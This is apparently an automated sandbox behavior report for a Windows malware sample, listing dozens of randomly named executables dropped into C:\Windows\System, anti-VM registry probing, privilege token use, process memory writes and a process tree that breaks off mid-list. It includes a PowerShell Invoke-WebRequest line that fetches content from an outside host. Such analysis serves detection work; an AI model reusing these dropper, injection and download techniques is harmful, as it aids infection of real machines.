File created C:\Windows\System\cnaWGTx.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\DoGzrEA.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\jYnzEfV.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\bdBRMcQ.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\DVgmjSp.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\LzpLAOH.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\fNIRhPS.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\sDJHOTp.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\tHcolnL.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\nfvHSXp.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ddcKgTI.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\DMQHYHl.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\tAJfoBL.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\dctsesP.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\OLFrYTU.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\qDDkccS.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\WbpCqgk.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\btFxVgT.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\iMIKxhg.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\jQUsNhG.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\gsQIier.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\RzfErcC.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZRUNdbX.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\IOZcNId.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\skZkFBX.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\xhrslXq.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\FmqwpRq.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\BOuDrcH.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\wczCaSm.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\WnGRzMx.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\GtxWxtz.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\MrgFNXE.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\sHHlleC.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\BWbVDIG.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\uPsSYSC.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\syqNsFg.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\BmYCNUH.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\dILayWO.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\qSIDqzX.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2368 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2368 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2368 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\SaGdFru.exe
PID 2368 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\SaGdFru.exe
PID 2368 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ySEPBUs.exe
PID 2368 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ySEPBUs.exe
PID 2368 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\hwDwGpz.exe
PID 2368 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\hwDwGpz.exe
PID 2368 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\OXIMvCN.exe
PID 2368 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\OXIMvCN.exe
PID 2368 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gJaZqcx.exe
PID 2368 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gJaZqcx.exe
PID 2368 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\mmgPhUr.exe
PID 2368 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\mmgPhUr.exe
PID 2368 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\wtbMaTi.exe
PID 2368 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\wtbMaTi.exe
PID 2368 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UWblMKU.exe
PID 2368 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UWblMKU.exe
PID 2368 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\xryNSlD.exe
PID 2368 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\xryNSlD.exe
PID 2368 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\HMrlYTT.exe
PID 2368 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\HMrlYTT.exe
PID 2368 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\smiSLgQ.exe
PID 2368 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\smiSLgQ.exe
PID 2368 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\poJhkXl.exe
PID 2368 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\poJhkXl.exe
PID 2368 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\YCNvqar.exe
PID 2368 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\YCNvqar.exe
PID 2368 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pUfQfkn.exe
PID 2368 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pUfQfkn.exe
PID 2368 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ZFXnwYe.exe
PID 2368 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ZFXnwYe.exe
PID 2368 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UkLCXyc.exe
PID 2368 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UkLCXyc.exe
PID 2368 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\kLmZeaz.exe
PID 2368 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\kLmZeaz.exe
PID 2368 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pEEfbXR.exe
PID 2368 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pEEfbXR.exe
PID 2368 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gTCAyvO.exe
PID 2368 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gTCAyvO.exe
PID 2368 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\qgOZnMX.exe
PID 2368 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\qgOZnMX.exe
PID 2368 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\rixMtLF.exe
PID 2368 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\rixMtLF.exe
PID 2368 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\lPvhgkD.exe
PID 2368 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\lPvhgkD.exe
PID 2368 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\hkJMpDu.exe
PID 2368 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\hkJMpDu.exe
PID 2368 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\seGZyPG.exe
PID 2368 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\seGZyPG.exe
PID 2368 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\zoEBvre.exe
PID 2368 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\zoEBvre.exe
PID 2368 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\WhRyIFF.exe
PID 2368 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\WhRyIFF.exe
PID 2368 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\epfFlsR.exe
PID 2368 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\epfFlsR.exe
PID 2368 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\BVKbfKl.exe
PID 2368 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\BVKbfKl.exe
PID 2368 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gwoRNsk.exe
PID 2368 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gwoRNsk.exe
PID 2368 wrote to memory of 420 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\QlhXaDE.exe
PID 2368 wrote to memory of 420 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\QlhXaDE.exe
PID 2368 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\flCAdqM.exe
PID 2368 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\flCAdqM.exe

Processes

C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\SaGdFru.exe

C:\Windows\System\SaGdFru.exe

C:\Windows\System\ySEPBUs.exe

C:\Windows\System\ySEPBUs.exe

C:\Windows\System\hwDwGpz.exe

C:\Windows\System\hwDwGpz.exe

C:\Windows\System\OXIMvCN.exe

C:\Windows\System\OXIMvCN.exe

C:\Windows\System\gJaZqcx.exe

C:\Windows\System\gJaZqcx.exe

C:\Windows\System\mmgPhUr.exe

C:\Windows\System\mmgPhUr.exe

C:\Windows\System\wtbMaTi.exe

C:\Windows\System\wtbMaTi.exe

C:\Windows\System\UWblMKU.exe

C:\Windows\System\UWblMKU.exe

C:\Windows\System\xryNSlD.exe

C:\Windows\System\xryNSlD.exe

C:\Windows\System\HMrlYTT.exe

C:\Windows\System\HMrlYTT.exe

C:\Windows\System\smiSLgQ.exe

C:\Windows\System\smiSLgQ.exe

C:\Windows\System\poJhkXl.exe

C:\Windows\System\poJhkXl.exe

C:\Windows\System\YCNvqar.exe

C:\Windows\System\YCNvqar.exe

C:\Windows\System\pUfQfkn.exe

C:\Windows\System\pUfQfkn.exe

C:\Windows\System\ZFXnwYe.exe

C:\Windows\System\ZFXnwYe.exe

C:\Windows\System\UkLCXyc.exe

C:\Windows\System\UkLCXyc.exe

C:\Windows\System\kLmZeaz.exe

C:\Windows\System\kLmZeaz.exe

C:\Windows\System\pEEfbXR.exe

C:\Windows\System\pEEfbXR.exe

C:\Windows\System\gTCAyvO.exe

C:\Windows\System\gTCAyvO.exe

C:\Windows\System\qgOZnMX.exe

C:\Windows\System\qgOZnMX.exe

C:\Windows\System\rixMtLF.exe

C:\Windows\System\rixMtLF.exe

C:\Windows\System\lPvhgkD.exe

C:\Windows\System\lPvhgkD.exe

C:\Windows\System\hkJMpDu.exe

C:\Windows\System\hkJMpDu.exe

C:\Windows\System\seGZyPG.exe

C:\Windows\System\seGZyPG.exe

C:\Windows\System\zoEBvre.exe

C:\Windows\System\zoEBvre.exe

C:\Windows\System\WhRyIFF.exe

C:\Windows\System\WhRyIFF.exe

C:\Windows\System\epfFlsR.exe

C:\Windows\System\epfFlsR.exe

C:\Windows\System\BVKbfKl.exe

C:\Windows\System\BVKbfKl.exe

C:\Windows\System\gwoRNsk.exe

C:\Windows\System\gwoRNsk.exe

C:\Windows\System\QlhXaDE.exe

C:\Windows\System\QlhXaDE.exe

C:\Windows\System\flCAdqM.exe

C:\Windows\System\flCAdqM.exe

C:\Windows\System\GpYlcpA.exe

C:\Windows\System\GpYlcpA.exe

C:\Windows\System\zsTQSfg.exe

C:\Windows\System\zsTQSfg.exe

C:\Windows\System\askiGRV.exe

C:\Windows\System\askiGRV.exe

C:\Windows\System\djYelDT.exe

C:\Windows\System\djYelDT.exe

C:\Windows\System\NogQCTo.exe

C:\Windows\System\NogQCTo.exe

C:\Windows\System\LHwlBdA.exe

C:\Windows\System\LHwlBdA.exe

C:\Windows\System\jfEFViD.exe

C:\Windows\System\jfEFViD.exe

C:\Windows\System\Gyzijzt.exe

C:\Windows\System\Gyzijzt.exe

C:\Windows\System\qaBlhVa.exe

C:\Windows\System\qaBlhVa.exe

C:\Windows\System\bzifaJW.exe

C:\Windows\System\bzifaJW.exe

C:\Windows\System\GyklXLO.exe

C:\Windows\System\GyklXLO.exe

C:\Windows\System\prttWPR.exe

C:\Windows\System\prttWPR.exe

C:\Windows\System\XWcxnih.exe

C:\Windows\System\XWcxnih.exe

C:\Windows\System\MCQjKyo.exe

C:\Windows\System\MCQjKyo.exe

C:\Windows\System\pwUBeNN.exe

C:\Windows\System\pwUBeNN.exe

C:\Windows\System\XPUHGqQ.exe

C:\Windows\System\XPUHGqQ.exe

C:\Windows\System\YsHIFnQ.exe

C:\Windows\System\YsHIFnQ.exe

C:\Windows\System\TZiucLU.exe

C:\Windows\System\TZiucLU.exe

C:\Windows\System\pfTMLjb.exe

C:\Windows\System\pfTMLjb.exe

C:\Windows\System\OVfJaxr.exe

C:\Windows\System\OVfJaxr.exe

C:\Windows\System\ZeyZkET.exe

C:\Windows\System\ZeyZkET.exe

C:\Windows\System\MNfVUzt.exe

C:\Windows\System\MNfVUzt.exe

C:\Windows\System\xZiOADO.exe

C:\Windows\System\xZiOADO.exe

C:\Windows\System\oGLBtVT.exe

C:\Windows\System\oGLBtVT.exe

C:\Windows\System\brwaOFj.exe

C:\Windows\System\brwaOFj.exe

C:\Windows\System\kcjfwLh.exe

C:\Windows\System\kcjfwLh.exe

C:\Windows\System\tSOzyeA.exe

C:\Windows\System\tSOzyeA.exe

C:\Windows\System\QPVJENK.exe

C:\Windows\System\QPVJENK.exe

C:\Windows\System\CXcIgVR.exe

C:\Windows\System\CXcIgVR.exe

C:\Windows\System\BNCbUPE.exe

C:\Windows\System\BNCbUPE.exe

C:\Windows\System\VKvHNeb.exe

C:\Windows\System\VKvHNeb.exe

C:\Windows\System\rPKaoha.exe

C:\Windows\System\rPKaoha.exe

C:\Windows\System\kmRgCdN.exe

C:\Windows\System\kmRgCdN.exe

C:\Windows\System\RXLMJni.exe

C:\Windows\System\RXLMJni.exe

C:\Windows\System\IWXOiFr.exe

C:\Windows\System\IWXOiFr.exe

C:\Windows\System\YLtkswf.exe

C:\Windows\System\YLtkswf.exe

C:\Windows\System\imrjfAg.exe

C:\Windows\System\imrjfAg.exe

C:\Windows\System\XxIlbLy.exe

C:\Windows\System\XxIlbLy.exe

C:\Windows\System\uWrabcy.exe

C:\Windows\System\uWrabcy.exe

C:\Windows\System\WTBqiyH.exe

C:\Windows\System\WTBqiyH.exe

C:\Windows\System\NIKTzBW.exe

C:\Windows\System\NIKTzBW.exe

C:\Windows\System\cKeXZNV.exe

C:\Windows\System\cKeXZNV.exe

C:\Windows\System\TYOvuie.exe

C:\Windows\System\TYOvuie.exe

C:\Windows\System\Qgicvky.exe

C:\Windows\System\Qgicvky.exe

C:\Windows\System\risTJFs.exe

C:\Windows\System\risTJFs.exe

C:\Windows\System\aZDPAJF.exe

C:\Windows\System\aZDPAJF.exe

C:\Windows\System\ojARqnw.exe

C:\Windows\System\ojARqnw.exe

C:\Windows\System\VVCyteB.exe

